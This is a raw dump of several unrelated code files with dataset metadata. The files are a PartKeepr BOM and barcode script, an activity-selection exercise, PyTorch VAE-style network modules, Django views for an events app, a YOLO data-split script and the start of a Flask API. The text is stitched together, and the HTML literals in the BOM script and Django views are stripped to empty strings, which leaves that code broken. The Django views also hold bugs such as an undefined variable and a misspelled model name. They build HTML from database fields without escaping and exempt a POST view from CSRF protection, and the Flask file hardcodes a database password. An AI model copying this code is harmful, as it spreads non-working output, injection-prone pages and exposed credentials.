{:10} | Part no = {:6} | Stock = {:5}|\").format(\n description, storage_locn, partNum, stockLevel))\n print(('{:_<162}').format(\"\"))\n print(\n (\"| Manufacturing status: {} {:<136}|\").format(\n \"\", Lifecycle))\n print((\"| RoHS: {}{:<153}|\").format(\"\", ROHS))\n print((\"| Name: {}{:<153}|\").format(\"\", name))\n getDistrib(PKid)\n print(('{:_<162}').format(\"\"))\n octopartLookup(name, species)\n print('\\n\\n')\n\n# More than one matching component exists - prompt user to choose\n if len(component_info) >= 2:\n component_info = get_choice(component_info)\n for (\n name,\n description,\n stockLevel,\n minStockLevel,\n averagePrice,\n partNum,\n storage_locn,\n PKid,\n Manufacturer) in component_info:\n ROHS = partStatus(PKid, 'RoHS')\n Lifecycle = partStatus(PKid, 'Lifecycle Status')\n\n if n_components != 0 and (quantity > stockLevel):\n count_LowStockLines = count_LowStockLines + 1\n background = 'rgba(60, 0, 0, 0.15)' # Insufficient stock : pinkish\n under.write(\n name +\n ',' +\n description +\n ',' +\n str(quantity) +\n ',' +\n str(stockLevel) +\n ',' +\n str(minStockLevel) +\n '\\n')\n else:\n background = 'rgba(0, 60, 0, 0.15)' # Adequate stock : greenish\n\n countParts = countParts + quantity\n quantity = str(quantity)\n\n\n# Print header row with white background - should move this somewwhere\n# else....\n if run == 0:\n web.write(\n \"\")\n web.write(\"\")\n picklist.write(\"\")\n picklist.write(\n \"\")\n run = 1\n\n# No PK components fit search criteria. Deal with here and drop before loop.\n# Not ideal but simpler.\n if n_components == 0:\n count_NPKP = count_NPKP + 1\n averagePrice = 0\n\n background = 'rgba(0, 60, 60, 0.3)' # Green Blue background\n web.write(\"\")\n web.write(\n \"\")\n web.write(\n \"\")\n web.write(\"\")\n web.write(\"\")\n web.write(\n \"\")\n web.write(\n \"\")\n web.write(\n \"\")\n web.write(\"\")\n web.write(\"\")\n\n picklist.write('\\n')\n\n missing.write(part + ',' + quantity + ',' + references + '\\n')\n name = \"-\"\n\n if n_components > 1: # Multiple component fit search criteria - set brown background\n background = 'rgba(60, 60, 0, 0.4)'\n\n i = 0\n for (\n name,\n description,\n stockLevel,\n minStockLevel,\n averagePrice,\n partNum,\n storage_locn,\n PKid,\n Manufacturer) in component_info:\n web.write(\"\")\n picklist.write('\\n')\n picklist.write(\"\")\n if i == 0: # 1st line where multiple components fit search showing RefDes\n web.write(\n \"\")\n picklist.write(\"\")\n\n web.write(\"\")\n picklist.write(\"\")\n i = i + 1\n count_PKP = count_PKP + 1\n else: # 2nd and subsequent lines where multiple components fit search showing RefDes\n web.write(\n \"\")\n picklist.write(\n \"\")\n invalidate_BOM_Cost = True\n lineCost = float(averagePrice) * int(quantity)\n if lineCost == 0:\n count_PWP += 1\n\n rohsIcon = compliance[ROHS]\n lifecycleIcon = manufacturing[Lifecycle]\n\n web.write(\n \"\")\n web.write(\"\")\n\n picklist.write(\"\")\n picklist.write(\"\")\n\n# Part number exists, therefore generate bar code\n# Requires Zint >1.4 - doesn't seem to like to write to another directory.\n# Ugly hack - write to current directory and move into place.\n if partNum != \"\":\n part_no = \"\"\n part_no = (partNum[1:])\n subprocess.call(['/usr/local/bin/zint',\n '--filetype=png',\n '-w',\n '10',\n '--height',\n '20',\n '-o',\n part_no,\n '-d',\n partNum])\n os.rename(part_no + '.png',\n 'assets/barcodes/' + part_no + '.png')\n if Manufacturer:\n web.write(\"\")\n else:\n web.write(\"\")\n picklist.write(\n \"\")\n else:\n # No Part number\n web.write(\n \"\")\n picklist.write(\n \"\")\n\n# Storage location exists, therefore generate bar code. Ugly hack - my location codes start with\n# a '$' which causes problems. Name the file without the leading character.\n if storage_locn != \"\":\n locn_trim = \"\"\n locn_trim = (storage_locn[1:])\n subprocess.call(['/usr/local/bin/zint',\n '--filetype=png',\n '-w',\n '10',\n '--height',\n '20',\n '-o',\n locn_trim,\n '-d',\n storage_locn])\n os.rename(\n locn_trim +\n '.png',\n 'assets/barcodes/' +\n locn_trim +\n '.png')\n\n web.write(\"\")\n else:\n # No storage location\n web.write(\n \"\")\n picklist.write(\"\")\n\n avPriceFMT = str(('£{:0,.2f}').format(averagePrice))\n linePriceFMT = str(('£{:0,.2f}').format(lineCost))\n bomCost = bomCost + lineCost\n\n web.write(\n \"\")\n web.write(\"\")\n web.write(\"\")\n web.write('\\n')\n\n picklist.write(\"\")\n\n picklist.write(\"\")\n picklist.write(\"\\n\")\n\n# Make labels for packets (need extra barcodes here)\n subprocess.call(['/usr/local/bin/zint',\n '--filetype=png',\n '-w',\n '10',\n '--height',\n '20',\n '-o',\n name,\n '-d',\n name])\n os.rename(name + '.png', 'assets/barcodes/' + name + '.png')\n subprocess.call(['/usr/local/bin/zint',\n '--filetype=png',\n '-w',\n '10',\n '--height',\n '20',\n '-o',\n quantity,\n '-d',\n quantity])\n os.rename(quantity + '.png',\n 'assets/barcodes/' + quantity + '.png')\n\n# Write out label webpage too\n labels.write(\"\")\n\n label_cnt = label_cnt + 1\n if label_cnt == 3:\n labels.write(\"\")\n label_cnt = 0\n\n# Prevent variables from being recycled\n storage_locn = \"\"\n partNum = \"\"\n part_no = \"\"\n\n writeCSV.writerow([references, name, quantity])\n references = \"\"\n name = \"\"\n quantity = \"\"\n\n# Write out footer for webpage\n web.write((\"
ReferencesPartDescriptionStockManufacturerDistributorQtyEachLine
ReferencesPartDescriptionStockPart NumberLocationQtyPick
\" +\n references +\n \"\" +\n part +\n \" Non PartKeepr componentNANA   NA \" +\n quantity +\n \"
\" +\n references +\n \"\" +\n references + \"\" + name + \"\" + name + \" *** ATTENTION *** Multiple sources available *** Use only ONE line *** *** ATTENTION *** Multiple sources available *** Use only ONE line *** \" +\n description +\n \" \" +\n str(stockLevel) + \"\" + description + \"\" +\n str(stockLevel) + \"\" + Manufacturer + \"NA NA NA \")\n distributors = getDistrib(PKid)\n web.write(\"\")\n for distributor in distributors:\n web.write(\"\")\n else:\n web.write(distributor[1])\n web.write(\"\")\n web.write(\"
\")\n web.write(distributor[0])\n web.write(\"\")\n if distributor[2]:\n web.write(\"\")\n web.write(distributor[1])\n web.write(\"
\")\n picklist.write(\n \"
NA NA \" +\n quantity +\n \" \" +\n avPriceFMT + \" \" +\n linePriceFMT + \"
\" +\n quantity + \"

\" + description[:64].upper())\n labels.write(\"

\")\n labels.write(\"

\" + name)\n labels.write(\"

\")\n labels.write(\"

\")\n labels.write(\n \"

Part number: #\" +\n part_no +\n \"
\")\n labels.write(\n \"
Location:\" +\n storage_locn +\n \"
\")\n labels.write(\"
\")\n labels.write(\"
\")\n labels.write(\n \"
Quantity: \" +\n quantity +\n \"
\")\n labels.write(\"

\")\n labels.write(\"

\" + file_name.upper())\n labels.write(\"

\")\n labels.write(\"

\" + references)\n labels.write(\"

\"))\n\n# Write out footer for picklist\n picklist.write((\"\"))\n\n# Write out footer for labels\n labels.write((\"\"))\n\n# Now script has run, construct table with part counts 7 costs etc.\n bomCostDisp = str(('£{:0,.2f}').format(bomCost))\n\n accounting.write(\"\")\n accounting.write(\" Total parts \")\n accounting.write(\"\" + str(countParts) + \"\")\n accounting.write(\"\")\n accounting.write(\" BOM Lines \")\n accounting.write(\"\" + str(count_BOMLine) + \"\")\n accounting.write(\"\")\n accounting.write(\" Non-PartKeepr Parts \")\n accounting.write(\"\" + str(count_NPKP) + \"\")\n accounting.write(\"\")\n accounting.write(\"PartKeepr Parts\")\n accounting.write(\"\" + str(count_PKP) + \"\")\n accounting.write(\"\")\n accounting.write(\"Parts without pricing info\")\n accounting.write(\"\" + str(count_PWP) + \"\")\n accounting.write(\"\")\n accounting.write(\"Low Stock\")\n accounting.write(\"\" + str(count_LowStockLines) + \"\")\n accounting.write(\"\")\n accounting.write(\"BOM Cost (Based on PartKeepr inventory prices)\")\n if not invalidate_BOM_Cost:\n accounting.write(\"\" + bomCostDisp + \"\")\n else:\n accounting.write(\"BOM price not calculated\")\n accounting.write(\n (\"

\"))\n\n# Assemble webpage\nweb = open(\"assets/web/temp.html\", \"r\")\nweb_out = open(\"webpage.html\", \"w\")\n\n\naccounting = open(\"assets/web/accounting.html\", \"r\")\naccounting = accounting.read()\n\nhtmlBody = web.read()\n\nweb_out.write(htmlHeader)\nweb_out.write(htmlAccountingHeader + accounting + \"
\")\nweb_out.write(htmlBodyHeader + htmlBody)\n\n# Open webpage in default browser\nwebbrowser.open('file://' + os.path.realpath('webpage.html'))\n","sub_path":"K2PK.py","file_name":"K2PK.py","file_ext":"py","file_size_in_byte":43480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"214865832","text":"def MaxActivities(arr, n):\r\n selected = []\r\n \r\n # Sort jobs according to finish time\r\n Activity.sort(key = lambda x : x[1])\r\n \r\n # The first activity always gets selected\r\n i = 0\r\n selected.append(arr[i])\r\n \r\n for j in range(1, n):\r\n \r\n '''If this activity has start time greater than or\r\n equal to the finish time of previously selected\r\n activity, then select it'''\r\n if arr[j][0] >= arr[i][1]:\r\n selected.append(arr[j])\r\n i = j\r\n return selected\r\n \r\n# Driver code\r\nActivity = [[5, 9], [1, 2], [3, 4], [0, 6],[5, 7], [8, 9]] \r\nn = len(Activity)\r\nselected = MaxActivities(Activity, n)\r\nprint(\"Following activities are selected :\")\r\nprint(selected)","sub_path":"Activity_Selection.py","file_name":"Activity_Selection.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"232773103","text":"import torch\n\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.autograd import Variable\n\n\n# Module for residual/skip connections\nclass FCResBlock(nn.Module):\n def __init__(self, dim, n, nonlinearity, batch_norm=True):\n \"\"\"\n\n :param dim:\n :param n:\n :param nonlinearity:\n \"\"\"\n super(FCResBlock, self).__init__()\n self.n = n\n self.nonlinearity = nonlinearity\n self.batch_norm = batch_norm\n if self.batch_norm:\n self.block = nn.ModuleList(\n [nn.ModuleList([nn.Linear(dim, dim), nn.BatchNorm1d(num_features=dim)])\n for _ in range(self.n)]\n )\n else:\n self.block = nn.ModuleList([nn.Linear(dim, dim) for _ in range(self.n)])\n\n def forward(self, x):\n e = x + 0\n\n if self.batch_norm:\n for i, pair in enumerate(self.block):\n fc, bn = pair\n e = fc(e)\n e = bn(e)\n if i < (self.n - 1):\n e = self.nonlinearity(e)\n\n else:\n for i, layer in enumerate(self.block):\n e = layer(e)\n if i < (self.n - 1):\n e = self.nonlinearity(e)\n\n return self.nonlinearity(e + x)\n\n\n# Building block for convolutional encoder with same padding\nclass Conv2d3x3(nn.Module):\n def __init__(self, in_channels, out_channels, downsample=False):\n super(Conv2d3x3, self).__init__()\n stride = 2 if downsample else 1\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=3,\n padding=1, stride=stride)\n\n def forward(self, x):\n return self.conv(x)\n\n\n# SHARED CONVOLUTIONAL ENCODER\nclass SharedConvolutionalEncoder(nn.Module):\n def __init__(self, nonlinearity):\n super(SharedConvolutionalEncoder, self).__init__()\n self.nonlinearity = nonlinearity\n\n self.conv_layers = nn.ModuleList([\n Conv2d3x3(in_channels=3, out_channels=32),\n Conv2d3x3(in_channels=32, out_channels=32),\n Conv2d3x3(in_channels=32, out_channels=32, downsample=True),\n # shape is now (-1, 32, 32, 32)\n Conv2d3x3(in_channels=32, out_channels=64),\n Conv2d3x3(in_channels=64, out_channels=64),\n Conv2d3x3(in_channels=64, out_channels=64, downsample=True),\n # shape is now (-1, 64, 16, 16)\n Conv2d3x3(in_channels=64, out_channels=128),\n Conv2d3x3(in_channels=128, out_channels=128),\n Conv2d3x3(in_channels=128, out_channels=128, downsample=True),\n # shape is now (-1, 128, 8, 8)\n Conv2d3x3(in_channels=128, out_channels=256),\n Conv2d3x3(in_channels=256, out_channels=256),\n Conv2d3x3(in_channels=256, out_channels=256, downsample=True)\n # shape is now (-1, 256, 4, 4)\n ])\n\n self.bn_layers = nn.ModuleList([\n nn.BatchNorm2d(num_features=32),\n nn.BatchNorm2d(num_features=32),\n nn.BatchNorm2d(num_features=32),\n nn.BatchNorm2d(num_features=64),\n nn.BatchNorm2d(num_features=64),\n nn.BatchNorm2d(num_features=64),\n nn.BatchNorm2d(num_features=128),\n nn.BatchNorm2d(num_features=128),\n nn.BatchNorm2d(num_features=128),\n nn.BatchNorm2d(num_features=256),\n nn.BatchNorm2d(num_features=256),\n nn.BatchNorm2d(num_features=256),\n ])\n\n def forward(self, x):\n h = x.view(-1, 3, 64, 64)\n for conv, bn in zip(self.conv_layers, self.bn_layers):\n h = conv(h)\n h = bn(h)\n h = self.nonlinearity(h)\n return h\n\n\n# PRE-POOLING FOR STATISTIC NETWORK\nclass PrePool(nn.Module):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, batch_size, n_features, n_hidden, hidden_dim, nonlinearity):\n super(PrePool, self).__init__()\n self.batch_size = batch_size\n self.n_features = n_features\n\n self.n_hidden = n_hidden\n self.hidden_dim = hidden_dim\n\n self.nonlinearity = nonlinearity\n\n # modules\n self.fc = nn.Linear(self.n_features, self.hidden_dim)\n self.bn = nn.BatchNorm1d(self.hidden_dim)\n\n def forward(self, h):\n # reshape and affine\n e = h.view(-1, self.n_features)\n e = self.fc(e)\n e = self.bn(e)\n e = self.nonlinearity(e)\n\n return e\n\n\n# POST POOLING FOR STATISTIC NETWORK\nclass PostPool(nn.Module):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, n_hidden, hidden_dim, c_dim, nonlinearity):\n super(PostPool, self).__init__()\n self.n_hidden = n_hidden\n self.hidden_dim = hidden_dim\n self.c_dim = c_dim\n\n self.nonlinearity = nonlinearity\n\n # modules\n self.fc_layers = nn.ModuleList([nn.Linear(self.hidden_dim, self.hidden_dim),\n nn.Linear(self.hidden_dim, self.hidden_dim)])\n self.bn_layers = nn.ModuleList([nn.BatchNorm1d(self.hidden_dim),\n nn.BatchNorm1d(self.hidden_dim)])\n\n self.fc_params = nn.Linear(self.hidden_dim, 2 * self.c_dim)\n self.bn_params = nn.BatchNorm1d(1, eps=1e-3, momentum=1e-2)\n\n def forward(self, e):\n for fc, bn in zip(self.fc_layers, self.bn_layers):\n e = fc(e)\n e = bn(e)\n e = self.nonlinearity(e)\n\n # affine transformation to parameters\n e = self.fc_params(e)\n\n # 'global' batch norm\n e = e.view(-1, 1, 2 * self.c_dim)\n e = self.bn_params(e)\n e = e.view(-1, 2 * self.c_dim)\n\n mean, logvar = e[:, :self.c_dim], e[:, self.c_dim:]\n\n return mean, logvar\n\n\n# STATISTIC NETWORK q(c|D)\nclass StatisticNetwork(nn.Module):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, batch_size, sample_size, n_features,\n n_hidden, hidden_dim, c_dim, nonlinearity):\n super(StatisticNetwork, self).__init__()\n self.batch_size = batch_size\n self.sample_size = sample_size\n self.n_features = n_features\n\n self.n_hidden = n_hidden\n self.hidden_dim = hidden_dim\n self.c_dim = c_dim\n\n self.nonlinearity = nonlinearity\n\n # modules\n self.prepool = PrePool(self.batch_size, self.n_features,\n self.n_hidden, self.hidden_dim, self.nonlinearity)\n self.postpool = PostPool(self.n_hidden, self.hidden_dim,\n self.c_dim, self.nonlinearity)\n\n def forward(self, h):\n e = self.prepool(h)\n e = self.pool(e)\n e = self.postpool(e)\n return e\n\n def pool(self, e):\n e = e.view(self.batch_size, self.sample_size, self.hidden_dim)\n e = e.mean(1).view(self.batch_size, self.hidden_dim)\n return e\n\n\nclass InferenceNetwork(nn.Module):\n \"\"\"\n Inference network q(z|h, z, c) gives approximate posterior over latent variables.\n \"\"\"\n def __init__(self, batch_size, sample_size, n_features,\n n_hidden, hidden_dim, c_dim, z_dim, nonlinearity):\n super(InferenceNetwork, self).__init__()\n self.batch_size = batch_size\n self.sample_size = sample_size\n self.n_features = n_features\n\n self.n_hidden = n_hidden\n self.hidden_dim = hidden_dim\n self.c_dim = c_dim\n\n self.z_dim = z_dim\n\n self.nonlinearity = nonlinearity\n\n # modules\n self.fc_h = nn.Linear(self.n_features, self.hidden_dim)\n self.fc_c = nn.Linear(self.c_dim, self.hidden_dim)\n self.fc_z = nn.Linear(self.z_dim, self.hidden_dim)\n\n self.fc_res_block = FCResBlock(dim=self.hidden_dim, n=self.n_hidden,\n nonlinearity=self.nonlinearity, batch_norm=True)\n\n self.fc_params = nn.Linear(self.hidden_dim, 2 * self.z_dim)\n self.bn_params = nn.BatchNorm1d(1, eps=1e-3, momentum=1e-2)\n\n def forward(self, h, z, c):\n # combine h, z, and c\n # embed h\n eh = h.view(-1, self.n_features)\n eh = self.fc_h(eh)\n eh = eh.view(self.batch_size, self.sample_size, self.hidden_dim)\n\n # embed z if we have more than one stochastic layer\n if z is not None:\n ez = z.view(-1, self.z_dim)\n ez = self.fc_z(ez)\n ez = ez.view(self.batch_size, self.sample_size, self.hidden_dim)\n else:\n ez = Variable(torch.zeros(eh.size()).cuda())\n\n # embed c and expand for broadcast addition\n ec = self.fc_c(c)\n ec = ec.view(self.batch_size, 1, self.hidden_dim).expand_as(eh)\n\n # sum and reshape\n e = eh + ez + ec\n e = e.view(self.batch_size * self.sample_size, self.hidden_dim)\n e = self.nonlinearity(e)\n\n # for layer in self.fc_block:\n e = self.fc_res_block(e)\n\n # affine transformation to parameters\n e = self.fc_params(e)\n\n # 'global' batch norm\n e = e.view(-1, 1, 2 * self.z_dim)\n e = self.bn_params(e)\n e = e.view(-1, 2 * self.z_dim)\n\n mean, logvar = e[:, :self.z_dim].contiguous(), e[:, self.z_dim:].contiguous()\n\n return mean, logvar\n\n\n# LATENT DECODER p(z|z, c)\nclass LatentDecoder(nn.Module):\n \"\"\"\n\n \"\"\"\n\n def __init__(self, batch_size, sample_size, n_features,\n n_hidden, hidden_dim, c_dim, z_dim, nonlinearity):\n super(LatentDecoder, self).__init__()\n self.batch_size = batch_size\n self.sample_size = sample_size\n self.n_features = n_features\n\n self.n_hidden = n_hidden\n self.hidden_dim = hidden_dim\n self.c_dim = c_dim\n\n self.z_dim = z_dim\n\n self.nonlinearity = nonlinearity\n\n # modules\n self.fc_c = nn.Linear(self.c_dim, self.hidden_dim)\n self.fc_z = nn.Linear(self.z_dim, self.hidden_dim)\n\n self.fc_res_block = FCResBlock(dim=self.hidden_dim, n=self.n_hidden,\n nonlinearity=self.nonlinearity, batch_norm=True)\n\n self.fc_params = nn.Linear(self.hidden_dim, 2 * self.z_dim)\n self.bn_params = nn.BatchNorm1d(1, eps=1e-3, momentum=1e-2)\n\n def forward(self, z, c):\n # combine z and c\n # embed z if we have more than one stochastic layer\n if z is not None:\n ez = z.view(-1, self.z_dim)\n ez = self.fc_z(ez)\n ez = ez.view(self.batch_size, self.sample_size, self.hidden_dim)\n else:\n ez = Variable(torch.zeros(self.batch_size, 1, self.hidden_dim).cuda())\n\n # embed c and expand for broadcast addition\n ec = self.fc_c(c)\n ec = ec.view(self.batch_size, 1, self.hidden_dim).expand_as(ez)\n\n # sum and reshape\n e = ez + ec\n e = e.view(-1, self.hidden_dim)\n e = self.nonlinearity(e)\n\n # for layer in self.fc_block:\n e = self.fc_res_block(e)\n\n # affine transformation to parameters\n e = self.fc_params(e)\n\n # 'global' batch norm\n e = e.view(-1, 1, 2 * self.z_dim)\n e = self.bn_params(e)\n e = e.view(-1, 2 * self.z_dim)\n\n mean, logvar = e[:, :self.z_dim].contiguous(), e[:, self.z_dim:].contiguous()\n\n return mean, logvar\n\n\n# Observation Decoder p(x|z, c)\nclass ObservationDecoder(nn.Module):\n \"\"\"\n\n \"\"\"\n def __init__(self, batch_size, sample_size, n_features,\n n_hidden, hidden_dim, c_dim, n_stochastic, z_dim,\n nonlinearity):\n super(ObservationDecoder, self).__init__()\n self.batch_size = batch_size\n self.sample_size = sample_size\n self.n_features = n_features\n\n self.n_hidden = n_hidden\n self.hidden_dim = hidden_dim\n self.c_dim = c_dim\n\n self.n_stochastic = n_stochastic\n self.z_dim = z_dim\n\n self.nonlinearity = nonlinearity\n\n # shared learnable log variance parameter\n self.logvar = nn.Parameter(torch.randn(1, 3, 64, 64).cuda())\n\n # modules\n self.fc_zs = nn.Linear(self.n_stochastic * self.z_dim, self.hidden_dim)\n self.fc_c = nn.Linear(self.c_dim, self.hidden_dim)\n\n self.fc_initial = nn.Linear(self.hidden_dim, self.hidden_dim)\n self.fc_linear = nn.Linear(self.hidden_dim, self.n_features)\n\n self.conv_layers = nn.ModuleList([\n Conv2d3x3(in_channels=256, out_channels=256),\n Conv2d3x3(in_channels=256, out_channels=256),\n nn.ConvTranspose2d(in_channels=256, out_channels=256,\n kernel_size=2, stride=2),\n Conv2d3x3(in_channels=256, out_channels=128),\n Conv2d3x3(in_channels=128, out_channels=128),\n nn.ConvTranspose2d(in_channels=128, out_channels=128,\n kernel_size=2, stride=2),\n Conv2d3x3(in_channels=128, out_channels=64),\n Conv2d3x3(in_channels=64, out_channels=64),\n nn.ConvTranspose2d(in_channels=64, out_channels=64,\n kernel_size=2, stride=2),\n Conv2d3x3(in_channels=64, out_channels=32),\n Conv2d3x3(in_channels=32, out_channels=32),\n nn.ConvTranspose2d(in_channels=32, out_channels=32,\n kernel_size=2, stride=2)\n ])\n\n self.bn_layers = nn.ModuleList([\n nn.BatchNorm2d(num_features=256),\n nn.BatchNorm2d(num_features=256),\n nn.BatchNorm2d(num_features=256),\n nn.BatchNorm2d(num_features=128),\n nn.BatchNorm2d(num_features=128),\n nn.BatchNorm2d(num_features=128),\n nn.BatchNorm2d(num_features=64),\n nn.BatchNorm2d(num_features=64),\n nn.BatchNorm2d(num_features=64),\n nn.BatchNorm2d(num_features=32),\n nn.BatchNorm2d(num_features=32),\n nn.BatchNorm2d(num_features=32),\n ])\n\n self.conv_mean = nn.Conv2d(32, 3, kernel_size=1)\n\n def forward(self, zs, c):\n ezs = self.fc_zs(zs)\n ezs = ezs.view(self.batch_size, self.sample_size, self.hidden_dim)\n\n ec = self.fc_c(c)\n ec = ec.view(self.batch_size, 1, self.hidden_dim).expand_as(ezs)\n\n e = ezs + ec\n e = self.nonlinearity(e)\n e = e.view(-1, self.hidden_dim)\n\n e = self.fc_initial(e)\n e = self.nonlinearity(e)\n e = self.fc_linear(e)\n e = e.view(-1, 256, 4, 4)\n\n for conv, bn in zip(self.conv_layers, self.bn_layers):\n e = conv(e)\n e = bn(e)\n e = self.nonlinearity(e)\n\n mean = self.conv_mean(e)\n mean = F.sigmoid(mean)\n\n return mean, self.logvar.expand_as(mean)","sub_path":"faces/facesnets.py","file_name":"facesnets.py","file_ext":"py","file_size_in_byte":14625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"423401301","text":"from django.views.decorators.csrf import csrf_exempt, csrf_protect\n\n# Create your views here.\nfrom django.http import HttpResponse\nfrom .models import *\n\ndef inicio(request):\n html = \"\"\"

Opções

\n \n \"\"\"\n return HttpResponse(html)\n\n\ndef pessoa(request):\n p = \"

Lista de autores

\"\n pessoas = Pessoa.objects.all()\n retorno = \"\"\n for pessoa in pessoas:\n retorno += \" Nome: \" + str(pessoa.nome) + \" email: \" + str(pessoa.email)\n retorno = str(p)+\"\"+retorno\n return HttpResponse(retorno)\n\n\ndef pessoaid(request,id):\n pessoa = Pessoa.objects.get(pk=id)\n return HttpResponse(\" Nome: \" + str(pessoa.nome) + \" email: \" + str(pessoa.email))\n\ndef autor(request):\n at = \"

Lista de autores

\"\n autores = Autor.objects.all()\n for autor in autores:\n at += \" Currículo: \" + str(autor.curriculo) + \" Artigos: \" + str(autor.artigo) + \" Pessoa: \" + str(autor.Pessoa)\n return HttpResponse(\"\"+at)\n\ndef autorid(request,id):\n autor = Autor.objects.get(pk=id)\n return HttpResponse(\" Currículo: \" + str(autor.curriculo) + \" Artigos: \" + str(autor.artigo) + \" Pessoa: \" + str(autor.Pessoa))\n\ndef pessoajuridica(request):\n pj =\"

Lista de pessoas jurídicas

\"\n pessoasJuridicas = PessoaJuridica.objects.all()\n for pessoaJuridica in pessoasJuridicas:\n pj += \" CNPJ: \"+ str(pessoaJuridica.cnpj)+ \" razaoSocial: \"+ str(pessoaJuridica.razaoSocial) + \"Pessoa: \" + str(pessoaJuridica.pessoa)\n return HttpResponse(\"\"+pj)\n\ndef pessoajuridicaid(request,id):\n pessoaJuridica = PessoaJuridica.objects.get(pk=id)\n return HttpResponse(\" CNPJ: \"+ str(pessoaJuridica.cnpj)+ \" razaoSocial: \"+ str(pessoaJuridica.razaoSocial) + \"Pessoa: \" + str(pessoaJuridica.pessoa))\n\ndef pessoafisica(request):\n pf = \"

Lista de pessoas físicas

\"\n pessoasFisicas = PessoaFisica.objects.all()\n for pessoaFisica in pessoasFisicas:\n pf += \"CPF: \" + str(pessoaFisica.cpf)+\"Pessoa: \"+ str(pessoaFisica.pessoa)\n return HttpResponse(\"\"+pf)\n\ndef pessoafisicaid(request,id):\n pessoaFisica = PessoaFisica.objects.get(pk=id)\n return HttpResponse(\"CPF: \" + str(pessoaFisica.cpf)+\"Pessoa: \"+ str(pessoaFisica.pessoa))\n\ndef evento(request):\n e = \"

Lista de eventos

\"\n eventos = Evento.objects.all()\n for ev in eventos:\n e += \"Nome: \" + str(ev.nome)+ \"Evento Pricipal: \" + str(ev.eventoPrincipal) + \"Sigla: \" + str(ev.sigla) + \"Data e hora de início: \" + str(ev.dataEHoraDeInicio)+ \"Palavras-chave: \"+ str(ev.palavrasChave) + \"Logotipo: \"+ str(ev.logotipo)+ \" Realizador: \"+ str(ev.pessoa.nome) + \\\n \"Cidade: \" + str(ev.cidade) + \" UF: \" + str(ev.uf) + \" Endereço: \" + str(ev.endereco) + \" CEP: \" + str(ev.cep)\n return HttpResponse(\"\"+e)\n\ndef eventoid(request,id):\n ev = Evento.objects.get(pk=id)\n return HttpResponse(\"Nome: \" + str(ev.nome)+ \"Evento Pricipal: \" + str(ev.eventoPrincipal) + \"Sigla: \" + str(ev.sigla) + \"Data e hora de início: \" + str(ev.dataEHoraDeInicio)+ \"Palavras-chave: \"+ str(ev.palavrasChave) + \"Logotipo: \"+ str(ev.logotipo)+ \" Realizador: \"+ str(ev.pessoa.nome) + \\\n \"Cidade: \" + str(ev.cidade) + \" UF: \" + str(ev.uf) + \" Endereço: \" + str(ev.endereco) + \" CEP: \" + str(ev.cep))\n\ndef eventocientifico(request):\n ec = \"

Lista de eventos científicos

\"\n eventoscientificos = EventoCientifico.objects.all()\n for e in eventoscientificos:\n ec+= \"issn: \"+ str(e.issn)+ \" Evento: \" + str(e.evento)\n return HttpResponse(\"\"+ec)\n\ndef eventocientificoid(request,id):\n ec = EventoCientifico.objects.get(pk=id)\n return HttpResponse(\"issn: \"+ str(e.issn)+ \" Evento: \" + str(e.evento))\n\ndef artigocientifico(request):\n ac = \"

Lista de artigos científicos

\"\n artigos = ArtigoCientifico.objects.all()\n for a in artigos:\n ac+= \"Título: \"+ str(a.titulo)+ \"Autores: \"+ str(a.autores)+\" Eventos: \" + str(a.evento)\n return HttpResponse(\"\"+ac)\n\ndef artigocientificoid(request,id):\n ac = ArtigooCientifico.objects.get(pk=id)\n return HttpResponse(\"Título: \"+ str(a.titulo)+ \"Autores: \"+ str(a.autores)+\" Eventos: \" + str(a.evento))\n\n\ndef listaInscricoes(request):\n html = \"

Lista de Tipo de Atividades

\"\n lista = InscricaoParticipantes.objects.all()\n for tipo in lista:\n html += '
  • {}
  • '.format(tipo.descricao)\n\n return HttpResponse(html)\n\n@csrf_exempt\ndef addParticipante(request):\n if request.method == 'POST':\n tipo = InscricaoParticipantes()\n tipo.descricao = request.POST['descricao']\n tipo.save()\n return HttpResponse('Inscrição realizada com sucesso')\n else:\n return HttpResponse('Falha na inserção de inscrição')\n\ndef inscricaoDeUmEvento(request,evento,inscricaoParticipantes,id):\n return HttpResponse(\"Evento: \" + str(evento) + \"inscrições: \" + str(inscricaoParticipantes))\n","sub_path":"evento/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"154684619","text":"'''\nallocate train and validation images for training\n'''\nimport glob, os\n\n# current_dir = os.path.dirname(os.path.abspath(__file__))\n\ncurrent_dir= '/media/hkuit164/WD20EJRX/yolov3-channel-and-layer-pruning/data/yoga/JPEGImages'\n# print(current_dir)\n# percentage_test = 10\npercentage_test = 10\nfile_train = open(current_dir[:-10]+'train.txt', 'w')\nfile_test = open(current_dir[:-10]+'val.txt', 'w')\n\ncounter = 1\nindex_test = round(100 / percentage_test)\n# print(list(glob.iglob(os.path.join(current_dir, \"*.jpg\"))))\nfor pathAndFilename in glob.iglob(os.path.join(current_dir, \"*.jpg\")):\n title, ext = os.path.splitext(os.path.basename(pathAndFilename))\n if counter == index_test:\n counter = 1\n file_test.write('./data/yoga/JPEGImages' + \"/\" + title + \".jpg\" + \"\\n\")\n else:\n file_train.write('./data/yoga/JPEGImages' + \"/\" + title + \".jpg\" + \"\\n\")\n counter = counter + 1\n","sub_path":"tools/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"493161474","text":"#!/usr/bin/env python2\n# -*- coding: UTF-8 -*-\n\nimport flask\nimport databasehandler\nimport json\nimport time\nimport os\nimport io\nimport cv2\nimport random\nimport base64\nfrom flask import request,Response,render_template,jsonify\n\n\n#web api\napi_name = \"Imagenet Evaluation\"\nip_addr = \"192.168.0.116\"\nip_port = 8006\n\n\n#Database\n\ndatabase_ip = \"localhost\"\nusername = \"li\"\npasswd = \"issysesosakau\"\ndatabase_name = \"ImagenetDBT\"\nimage_table = \"ImageInfo\"\npreference_table = \"ImagePreference\"\nrelativity_table = 